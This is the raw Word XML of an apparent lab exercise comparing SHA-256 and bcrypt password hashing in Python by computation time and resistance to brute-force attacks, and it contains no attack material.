                <v:shape id="Graphic 102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rFwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/JbsIw&#10;EL1X6j9Yg8QNHHKgEGIQ6iJ6bFMkrpN4SALxOI0NhHx9XalSb/P01kk3vWnElTpXW1Ywm0YgiAur&#10;ay4V7L/eJgsQziNrbCyTgjs52KwfH1JMtL3xJ10zX4oQwi5BBZX3bSKlKyoy6Ka2JQ7c0XYGfYBd&#10;KXWHtxBuGhlH0VwarDk0VNjSc0XFObsYBflev3x/LOMnXd6Ph9fdaaCcBqXGo367AuGp9//iP/e7&#10;DvOjGH6fCRfI9Q8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAoF0axcMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m6172200,l,,,19685r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 103" o:spid="_x0000_s1028" style="position:absolute;left:61704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CfwgAAANw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A4k/CfwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 104" o:spid="_x0000_s1029" style="position:absolute;left:3;top:5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IGswwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hhN5qYltqXY2ihUJ7UKktC96GzbhZ3EyWJNXtvzeFQm/zeJ8zX/auFWcKsfGsYTxSIIgr&#10;bxquNXx9vt49g4gJ2WDrmTT8UITlYnAzx8L4C3/QeZ9qkUM4FqjBptQVUsbKksM48h1x5o4+OEwZ&#10;hlqagJcc7lp5r9STdNhwbrDY0Yul6rT/dhrKEOxqt92s6f2hOzQTVU7XsdT6dtivZiAS9elf/Od+&#10;M3m+eoTfZ/IFcnEFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAQiBrMMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3035l,3035,,16751r3048,l3048,3035xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 105" o:spid="_x0000_s1030" style="position:absolute;left:61704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ZecwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4X9j+EG+xFZrKBMrpGGcpgD6WglT0fza0pNpeSZFr/eyMM9nYf388rN5MbxJlC7D1reFkoEMSt&#10;Nz13Go7N5/MbiJiQDQ6eScOVImzWD7MSC+MvvKfzIXUih3AsUINNaSykjK0lh3HhR+LM/fjgMGUY&#10;OmkCXnK4G+SrUivpsOfcYHGkraX2dPh1GuZcV7Xtm5PbNd+NClWsB1lp/fQ4fbyDSDSlf/Gf+8vk&#10;+WoJ92fyBXJ9AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOrRl5zBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,13715r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 10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HwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CFLx1kwpKWY2iBaHUk1svvU034+7qZrIk0V3/vREEb/N4nzNfDrYVF/KhcazhI1MgiEtn&#10;Gq407H83758gQkQ22DomDVcKsFy8vswxN67nHV2KWIkUwiFHDXWMXS5lKGuyGDLXESfu4LzFmKCv&#10;pPHYp3DbyrFSU2mx4dRQY0dfNZWn4mw1kCuxUP3P9t8dN6e/YzHxazPRevQ2rGYgIg3xKX64v02a&#10;r6ZwfyZdIBc3AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMVtWgfBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 107" o:spid="_x0000_s1032" style="position:absolute;left:3;top:172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tCwxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;EIXvwv6HMAteZE0VsUs1yqIIghd1XfQ4NGNbtpmEJmr990YQvM3w3vvmzXTemlpcqfGVZQWDfgKC&#10;OLe64kLB4Xf19Q3CB2SNtWVScCcP89lHZ4qZtjfe0XUfChEh7DNUUIbgMil9XpJB37eOOGpn2xgM&#10;cW0KqRu8Rbip5TBJxtJgxfFCiY4WJeX/+4uJlLFbVGb45y6H7Wh7vK82veUpVar72f5MQARqw9v8&#10;Sq91rJ+k8HwmTiBnDwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCPdtCwxQAAANw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ADF66D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D377EF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442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SHA-256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bcrypt hashing algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AACD87B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="19"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F99331" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="230" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:t>: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6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58"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hashing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in terms of their computation time and resistance to brute-force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38909498" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA1643C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1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538F238B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35536BD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5C5D7AA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3" w:line="269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hashlib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SHA-256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hashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093797E3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8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library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bcrypt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hashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CAA7EC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5D98D503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4B30AA7B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E141B2F" wp14:editId="4463BAF5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>297292</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6173470" cy="2095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1704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90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7652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1402D" id="Group 108" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:23.4pt;width:486.1pt;height:1.65pt;z-index:-15719936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&#10;">
                <v:shape id="Graphic 109" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:203;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6172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LlwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN50oxZpU1cpFcGr1oO9TbJjEs3Oxuxo0n/fLRR6m8f7nOW6d7V6UBsqzwamkwQUce5t&#10;xYWB4+d2/AIqCLLF2jMZ+KYA69XgaYmp9R3v6XGQQsUQDikaKEWaVOuQl+QwTHxDHLmzbx1KhG2h&#10;bYtdDHe1niXJQjusODaU2NBHSfn1cHcGsueTsFz6r/2mqze3Ypvd5rPMmNGwf38DJdTLv/jPvbNx&#10;fvIKv8/EC/TqBwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHJCMuXBAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m6172200,l,,,20320r6172200,l6172200,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 110" o:spid="_x0000_s1028" style="position:absolute;left:6170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g1xAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PT8Mw&#10;DMXvSPsOkSdxY+l2QKMsm2ATEpcxUeBuNSataJwqSf/s2+MDEjdb7/m9n3eH2XdqpJjawAbWqwIU&#10;cR1sy87A58fL3RZUysgWu8Bk4EoJDvvFzQ5LGyZ+p7HKTkkIpxINNDn3pdapbshjWoWeWLTvED1m&#10;WaPTNuIk4b7Tm6K41x5bloYGezo2VP9Ugzegz9uH5+vlOPSuOr+d4jB9XUZnzO1yfnoElWnO/+a/&#10;61cr+GvBl2dkAr3/BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAE2Y+DXEAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m3047,l,,,3047r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 111" o:spid="_x0000_s1029" style="position:absolute;left:3;top:9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TpwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CFLzV7Faw7dYoKgh6sFIrC96GzXSzdDNZkqjrvzdCobd5vM+ZzHrbijP50DhWkA8zEMSV&#10;0w3XCg7fq+c3ECEia2wdk4IrBZhNHx8mWGh34S8672MtUgiHAhWYGLtCylAZshiGriNO3I/zFmOC&#10;vpba4yWF21a+ZNlYWmw4NRjsaGmo+t2frILSezPffW4XtBl1x+Y1K98XoVRq8NTPP0BE6uO/+M+9&#10;1ml+nsP9mXSBnN4AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAlKa06cMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m3048,3048l,3048,,16751r3048,l3048,3048xem6173152,r-3035,l6170117,3035r3035,l6173152,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 112" o:spid="_x0000_s1030" style="position:absolute;left:61704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Zk1wAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwwl5EUz0sUo2yKAseSmGteB6a2abYTEqS1frvN4LgbR7vcza7wXbiRj60jhUs5hkI4trp&#10;lhsF5+p7tgIRIrLGzjEpeFCA3XY82mCu3Z1/6HaKjUghHHJUYGLscylDbchimLueOHG/zluMCfpG&#10;ao/3FG47ucyyT2mx5dRgsKe9ofp6+rMKplwWpWmrqz1UlyrzRSg7WSj1MRm+1iAiDfEtfrmPOs1f&#10;LOH5TLpAbv8BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA4OGZNcAAAADcAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,13715r3047,l3047,xe" fillcolor="#e2e2e2" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 113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9CwAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwgjdNVRTpGmUVBHFPW714m21m22ozKUm09d+bhQVv83ifs9p0phYPcr6yrGAyTkAQ51ZX&#10;XCg4n/ajJQgfkDXWlknBkzxs1v3eClNtW/6mRxYKEUPYp6igDKFJpfR5SQb92DbEkfu1zmCI0BVS&#10;O2xjuKnlNEkW0mDFsaHEhnYl5bfsbhSQzTFL2uPXj73ub5drNndbPVdqOOg+P0AE6sJb/O8+6Dh/&#10;MoO/Z+IFcv0CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAUMNvQsAAAADcAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" path="m3047,l,,,3048r3047,l3047,xe" fillcolor="#9f9f9f" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 114" o:spid="_x0000_s1032" style="position:absolute;left:3;top:176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gaxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;EIXvwv6HMAteRFNFXKlGWRRB8OJqFz0OzdiWbSahiVr/vREWvM3w3vvmzXzZmlrcqPGVZQXDQQKC&#10;OLe64kJBdtz0pyB8QNZYWyYFD/KwXHx05phqe+cfuh1CISKEfYoKyhBcKqXPSzLoB9YRR+1iG4Mh&#10;rk0hdYP3CDe1HCXJRBqsOF4o0dGqpPzvcDWRMnGryox+3TXbj/enx2bXW5+/lOp+tt8zEIHa8Db/&#10;p7c61h+O4fVMnEAungAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD6fdgaxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA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091B15" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="21"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6960CBC5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417627EC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Hashing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Algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE65D07" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8BBCA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="470"/>
      </w:pPr>
      <w:r>
        <w:t>Hashing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fixed-size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typically a hash value or digest. Hash functions are one-way operations, meaning it‟s computationally infeasible to reverse the process and retrieve the original input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D0DD61" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C9D178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 w:right="1160"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>SHA-256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SHA-2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family,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produces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256-bit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(32-byte)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value.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but vulnerable to brute-force and rainbow table attacks, as it is not inherently designed to be computationally slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3375AC8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 w:right="1021"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>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derivation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function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deliberately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designed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slow,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helps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defend against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brute-force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rainbow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attacks.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incorporates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"salt"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ensure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identical passwords do not hash to the same value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446993C2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215660F4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Installing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Required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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D24490" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="629D0C92" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pP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60"/>
          <w:sz w:val="20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bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> hashing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF82916" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744D07FB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000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bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3823F7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="194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66C89744" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385FF20E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>We</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>will 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Python script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5E192" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3B79C0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="269" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Hashes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password)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ourier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BAA12E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1078"/>
        </w:tabs>
        <w:spacing w:line="268" w:lineRule="exact"/>
        <w:ind w:left="1078" w:hanging="358"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri"/>
        </w:rPr>
        <w:t>Compares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computation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algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC620CE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Discusses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security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considerations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resistance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brute-force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attacks.</w:t>
